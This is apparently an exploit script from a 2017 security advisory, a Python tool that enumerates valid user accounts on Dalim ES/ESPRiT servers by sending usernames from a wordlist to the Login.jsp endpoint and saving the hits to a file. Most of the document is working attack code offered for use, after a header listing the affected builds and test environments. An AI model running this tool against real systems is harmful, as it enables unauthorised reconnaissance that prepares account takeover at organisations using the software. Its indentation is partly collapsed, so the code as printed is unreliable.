#!/usr/bin/env python### DALIM SOFTWARE ES Core 5.0 build 7184.1 User Enumeration Weakness### Vendor: Dalim Software GmbH# Product web page: https://www.dalim.com# Affected version: ES/ESPRiT 5.0 (build 7184.1)# (build 7163.2)# (build 7163.0)# (build 7135.0)# (build 7114.1)# (build 7114.0)# (build 7093.1)# (build 7093.0)# (build 7072.0)# (build 7051.3)# (build 7051.1)# (build 7030.0)# (build 7009.0)# (build 6347.0)# (build 6326.0)# (build 6305.1)# (build 6235.9)# (build 6172.1)# ES/ESPRiT 4.5 (build 6326.0)# (build 6144.2)# (build 5180.2)# (build 5096.0)# (build 4314.3)# (build 4314.0)# (build 4146.4)# (build 3308.3)# ES/ESPRiT 4.0 (build 4202.0)# (build 4132.1)# (build 2235.0)# ES/ESPRiT 3.0## Summary: ES is the new Enterprise Solution from DALIM SOFTWARE built# from the successful TWIST, DIALOGUE and MISTRAL product lines. The ES# Core is the engine that can handle project tracking, JDF device workflow,# dynamic user interface building, volume management. Each ES installation# will have different features, depending on the license installed: online# approval, prepress workflow, project tracking, imposition management...## ES is a collaborative digital asset production and management platform,# offering services ranging from online approval to web-based production# environment for all participants of the production cycle, including brand# owners, agencies, publishers, pre-media, printers and multichannel service# provider. ES lets users plan, execute and control any aspect of media# production, regardless of the final use of the output (print, web, ebook,# movie, and others). It ensures productivity and longterm profitability.## Desc: The weakness is caused due to the 'Login.jsp' script enumerating# the list of valid usernames when some characters are provided via the# 'login' parameter.## Tested on: Red Hat Enterprise Linux Server release 7.3 (Maipo)#CentOS 7#Apache Tomcat/7.0.78#Apache Tomcat/7.0.67#Apache Tomcat/7.0.42#Apache Tomcat/6.0.35#Apache-Coyote/1.1#Java/1.7.0_80#Java/1.6.0_21### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic# @zeroscience### Advisory ID: ZSL-2017-5425# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5425.php### 15.06.2017#
import argparse
import requests
import sys
from colorama import Fore, Back, Style, init
init()
print 'User Enumeration Tool v0.3 for DALiM ES <= v5.0'
parser = argparse.ArgumentParser()
parser.add_argument('-t', help='target IP or hostname', action='store', dest='target')
parser.add_argument('-f', help='username wordlist', action='store', dest='file')
args = parser.parse_args()if len(sys.argv)!= 5:
parser.print_help()
sys.exit()
host = args.target
fn = args.file
try:
users = open(args.file,'r')
except(IOError):
print '[!] Error opening \'' +fn+ '\' file.'
sys.exit()
lines = users.read().splitlines()
print '[*] Loaded %d usernames for testing.\n'% len(open(fn).readlines())
users.close()
results = open('validusers.txt','w')for line in lines:
try:
r = requests.post("http://"+host+ "/Esprit/public/Login.jsp",data={'actionRole' : 'getRoles','login' : line})
print '[+] Testing username: '+Fore.GREEN+line+Fore.RESET
testingus = r.text[50:72]if testingus[19:20]!= "\"":
print '[!] Found '+Style.BRIGHT+Fore.RED+line+Fore.RESET+Style.RESET_ALL+ ' as valid registered user.'
results.write('%s\n'% line)
except:
print '[!] Error connecting to http://'+host
sys.exit()
results.close()
print '\n[*] Enumeration completed!'
print '[*] Valid usernames successfully written to \'validusers.txt\' file.\n'
